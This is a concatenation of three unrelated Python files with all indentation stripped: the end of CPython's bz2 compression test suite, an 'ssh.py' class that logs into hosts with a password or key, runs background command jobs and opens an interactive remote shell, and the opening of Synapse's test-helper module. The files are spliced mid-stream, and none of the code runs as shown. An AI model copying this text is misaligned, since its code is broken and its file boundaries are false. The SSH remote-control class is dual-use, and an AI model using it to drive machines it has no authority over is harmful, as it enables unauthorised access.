def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
ssh.py | #The MIT License (MIT)
#Copyright (c) 2014-2018 Marcos Nesster (mh4x0f)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import signal
import threading
import time
from socket import gethostbyname
from datetime import datetime
from pexpect import pxssh
from os import path
from shell.core.utility.threads import Thread_Jobs
from shell.core.utility.color import setcolor,display_messages
class ssh(object):
def __init__(self, host,port, user, password,checkconnect=True):
self.settings = {'Host': host,'User': user,'Port': port,'Password': password}
self.jobs = {'Running': False,'Command': None,'Packets':[]}
self.connection,self.password = checkconnect,password
self.status,self.session,self.activated = None,None,False
thread_connect = threading.Thread(target=self.ThreadSSH,args=[])
thread_connect.setDaemon(True)
thread_connect.start()
thread_connect.join()
def job_start(self,cmd):
self.thread_jobs = Thread_Jobs(cmd,self.session)
self.thread_jobs.setDaemon(True)
self.thread_jobs.start()
self.jobs['Running'] = True
self.jobs['Command'] = cmd
display_messages('Started Job::{} from command:: {}'.format(self.settings['Host'],cmd),sucess=True)
self.jobs['Packets'] = [self.settings['Host'],self.jobs['Command'],
str(datetime.fromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"))]
def job_stop(self):
self.thread_jobs.stop(self.settings['Host'])
self.jobs['Running'] = False
self.activated = False
self.logout()
def ThreadSSH(self):
try:
self.session = pxssh.pxssh(encoding='utf-8')
if (not path.isfile(self.settings['Password'])):
self.session.login(gethostbyname(self.settings['Host']), self.settings['User'],
self.settings['Password'],port=self.settings['Port'])
else:
self.session.login(gethostbyname(self.settings['Host']), self.settings['User'],
ssh_key=self.settings['Password'],port=self.settings['Port'])
if self.connection:
self.status = '[{}]'.format(setcolor('ON',color='green'))
self.activated = True
except Exception, e:
self.status = '[{}]'.format(setcolor('OFF',color='red'))
self.activated = False
def logout(self):
self.session.terminate(True)
self.session.close()
self.activated = False
def info(self):
print display_messages('System Informations:',sublime=True,info=True)
print('Host :: {}'.format(self.settings['Host']))
print('PID :: {}'.format(self.session.pid))
print('timeout :: {}'.format(self.session.timeout))
print('Shell :: {}'.format(self.session.name))
kernelversion = self.send_command('uname -r')
print('Kernel :: {}\n'.format(kernelversion.split()))
def interactive(self):
signal.signal(signal.SIGINT, self.signal_handler)
print display_messages('Remote Shell:',sublime=True,info=True)
self.session.PROMPT_SET_SH = "PS1='{}@{}\$ '".format(self.settings['Host'],self.settings['User'])
self.session.auto_prompt_reset = False
self.session.set_unique_prompt()
self.session.interact()
print display_messages('Session closed {}'.format(self.session.name),info=True)
def signal_handler(self,signal, frame):
print('Exit interact shell!')
self.session.terminate(True)
def send_command(self,cmd):
self.session.sendline(cmd)
try:
self.session.prompt()
return str(self.session.before).replace(cmd,'')
except Exception : return ''
|
utils.py | '''
This contains the core test helper code used in Synapse.
This gives the opportunity for third-party users of Synapse to test their
code using some of the same helpers used to test Synapse.
The core class, synapse.tests.utils.SynTest is a subclass of unittest.TestCase,
with several wrapper functions to allow for easier calls to assert* functions,
with less typing. There are also Synapse specific helpers, to load Cortexes and
whole both multi-component environments into memory.
Since SynTest is built from unittest.TestCase, the use of SynTest is
compatible with the unittest, nose and pytest frameworks. This does not lock
users into a particular test framework; while at the same time allowing base
use to be invoked via the built-in Unittest library, with one important exception:
due to an unfortunate design approach, you cannot use the unittest module command
line to run a *single* async unit test. pytest works fine though.
'''
import io
import os
import sys
import copy
import types
import shutil
import asyncio
import hashlib
import inspect
import logging
import tempfile
import unittest
import threading
import contextlib
import collections
import unittest.mock as mock
import aiohttp
from prompt_toolkit.formatted_text import FormattedText
import synapse.exc as s_exc
import synapse.axon as s_axon
import synapse.glob as s_glob
import synapse.common as s_common
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.cryotank as s_cryotank
import synapse.telepath as s_telepath
import synapse.lib.coro as s_coro
import synapse.lib.cmdr as s_cmdr
import synapse.lib.hive as s_hive
import synapse.lib.task as s_task
import synapse.lib.const as s_const
import synapse.lib.layer as s_layer
import synapse.lib.nexus as s_nexus
import synapse.lib.storm as s_storm
import synapse.lib.types as s_types
import synapse.lib.module as s_module
import synapse.lib.output as s_output
import synapse.lib.httpapi as s_httpapi
import synapse.lib.msgpack as s_msgpack
import synapse.lib.lmdbslab as s_lmdbslab
import synapse.lib.thishost as s_thishost
import synapse.lib.stormtypes as s_stormtypes
logger = logging.getLogger(__name__)
# Default LMDB map size for tests
TEST_MAP_SIZE = s_const.gibibyte
async def alist(coro):
return [x async for x in coro]
class LibTst(s_stormtypes.Lib):
def addLibFuncs(self):
self.locls.update({
'beep': self.beep,
})
async def beep(self, valu):
'''
Example storm func
'''
ret = f'A {valu} beep!'
return ret
class TestType(s_types.Type):
stortype = s_layer.STOR_TYPE_UTF8
def postTypeInit(self):
self.setNormFunc(str, self._normPyStr)
